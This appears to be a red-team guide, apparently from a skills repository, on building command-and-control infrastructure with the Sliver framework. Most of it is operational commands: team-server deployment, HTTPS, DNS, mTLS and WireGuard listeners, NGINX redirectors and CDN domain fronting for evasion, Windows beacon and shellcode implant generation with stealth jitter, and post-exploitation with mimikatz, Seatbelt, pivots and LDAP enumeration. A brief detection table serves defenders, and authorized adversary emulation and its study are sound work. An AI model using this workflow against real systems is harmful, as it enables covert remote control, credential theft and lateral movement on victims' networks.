seikaikyo/building-c2-infrastructure-with-sliver-framework

Building C2 Infrastructure with Sliver Framework

Overview

Sliver is an open-source, cross-platform adversary emulation framework developed by BishopFox, written in Go. It provides red teams with implant generation, multi-protocol C2 channels (mTLS, HTTP/S, DNS, WireGuard), multi-operator support, and extensive post-exploitation capabilities. Sliver supports beacon (asynchronous) and session (interactive) modes, making it suitable for both long-haul operations and interactive exploitation. A properly architected Sliver infrastructure uses redirectors, domain fronting, and HTTPS certificates to maintain operational resilience and avoid detection.

When to Use

• When deploying or configuring building c2 infrastructure with sliver framework capabilities in your environment
• When establishing security controls aligned to compliance requirements
• When building or improving security architecture for this domain
• When conducting security assessments that require this implementation

Prerequisites

• Familiarity with red teaming concepts and tools
• Access to a test or lab environment for safe execution
• Python 3.8+ with required dependencies installed
• Appropriate authorization for any testing activities

Objectives

• Deploy a Sliver team server on hardened cloud infrastructure
• Configure HTTPS, mTLS, DNS, and WireGuard listeners
• Generate implants (beacons and sessions) for target platforms
• Set up NGINX or Apache redirectors between implants and the team server
• Implement Cloudflare or CDN-based domain fronting for traffic obfuscation
• Configure multi-operator access with certificate-based authentication
• Establish operational security controls for C2 communications

MITRE ATT&CK Mapping

• T1071.001 - Application Layer Protocol: Web Protocols
• T1071.004 - Application Layer Protocol: DNS
• T1573.002 - Encrypted Channel: Asymmetric Cryptography
• T1090.002 - Proxy: External Proxy (Redirectors)
• T1105 - Ingress Tool Transfer
• T1132.001 - Data Encoding: Standard Encoding
• T1572 - Protocol Tunneling

Workflow

Phase 1: Team Server Deployment

1. Provision a VPS (e.g., DigitalOcean, Linode, AWS EC2) for the team server
2. Harden the OS: disable SSH password auth, configure UFW/iptables, install fail2ban
3. Install Sliver using the official install script:

   curl https://sliver.sh/install | sudo bash
   

4. Start the Sliver server daemon:

   systemctl start sliver
   # Or run interactively
   sliver-server
   

5. Generate operator configuration files for team members:

   new-operator --name operator1 --lhost <team-server-ip>
   

Phase 2: Listener Configuration

1. Configure an HTTPS listener with a legitimate SSL certificate:

   https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pem
   

2. Configure a DNS listener for fallback C2:

   dns --domains c2dns.example.com --lport 53
   

3. Configure mTLS listener for high-security sessions:

   mtls --lhost 0.0.0.0 --lport 8888
   

4. Configure WireGuard listener for tunneled access:

   wg --lport 51820
   

Phase 3: Redirector Setup

1. Deploy a separate VPS as a redirector (positioned between targets and team server)
2. Install and configure NGINX as a reverse proxy:

   server {
       listen 443 ssl;
       server_name c2.example.com;
       ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem;
       ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;
   
       location / {
           proxy_pass https://<team-server-ip>:443;
           proxy_ssl_verify off;
           proxy_set_header Host $host;
           proxy_set_header X-Real-IP $remote_addr;
       }
   }
   

3. Configure iptables rules on the team server to only accept connections from the redirector:

   iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
   iptables -A INPUT -p tcp --dport 443 -j DROP
   

4. Optionally set up Cloudflare as a CDN layer in front of the redirector for domain fronting

Phase 4: Implant Generation

1. Generate an HTTPS beacon implant:

   generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payload
   

2. Generate a DNS beacon for restricted networks:

   generate beacon --dns c2dns.example.com --os windows --arch amd64
   

3. Generate a shellcode payload for injection:

   generate --http https://c2.example.com --os windows --arch amd64 --format shellcode
   

4. Configure beacon jitter and callback intervals:

   generate beacon --http https://c2.example.com --seconds 60 --jitter 30
   

Phase 5: Post-Exploitation Operations

1. Interact with active beacons/sessions:

   beacons        # List active beacons
   use <beacon-id> # Interact with a beacon
   

2. Execute post-exploitation modules:

   ps              # Process listing
   netstat         # Network connections
   execute-assembly /path/to/Seatbelt.exe -group=all  # Run .NET assemblies
   sideload /path/to/mimikatz.dll  # Load DLLs
   

3. Set up pivots for internal network access:

   pivots tcp --bind 0.0.0.0:9898  # Create pivot listener on compromised host
   

4. Use BOF (Beacon Object Files) for in-memory execution:

   armory install sa-ldapsearch  # Install from armory
   sa-ldapsearch -- "(objectClass=user)"  # Execute BOF
   

Tools and Resources

| Tool | Purpose | Platform | |------|---------|----------| | Sliver Server | C2 team server and implant management | Linux/macOS/Windows | | Sliver Client | Operator console for team members | Cross-platform | | NGINX | Redirector and reverse proxy | Linux | | Certbot | Let's Encrypt SSL certificate generation | Linux | | Cloudflare | CDN and domain fronting | Cloud | | Armory | Sliver extension/BOF package manager | Built-in |

Detection Signatures

| Indicator | Detection Method | |-----------|-----------------| | Default Sliver HTTP headers | Network traffic analysis for unusual User-Agent strings | | mTLS on non-standard ports | Firewall logs for outbound connections to unusual ports | | DNS TXT record queries with high entropy | DNS log analysis for encoded C2 traffic | | WireGuard UDP traffic on port 51820 | Network flow analysis for WireGuard handshake patterns | | Sliver implant file hashes | EDR/AV signature matching against known Sliver samples |

Validation Criteria

• [ ] Team server deployed and hardened with firewall rules
• [ ] HTTPS listener configured with valid SSL certificate
• [ ] DNS listener configured as fallback C2 channel
• [ ] At least one redirector deployed between targets and team server
• [ ] Multi-operator access configured with unique certificates
• [ ] Implants generated for target operating systems
• [ ] Beacon callback intervals and jitter configured for stealth
• [ ] Post-exploitation modules tested (process listing, .NET assembly execution)
• [ ] Pivot functionality validated for internal network access
• [ ] All C2 traffic encrypted and passing through redirectors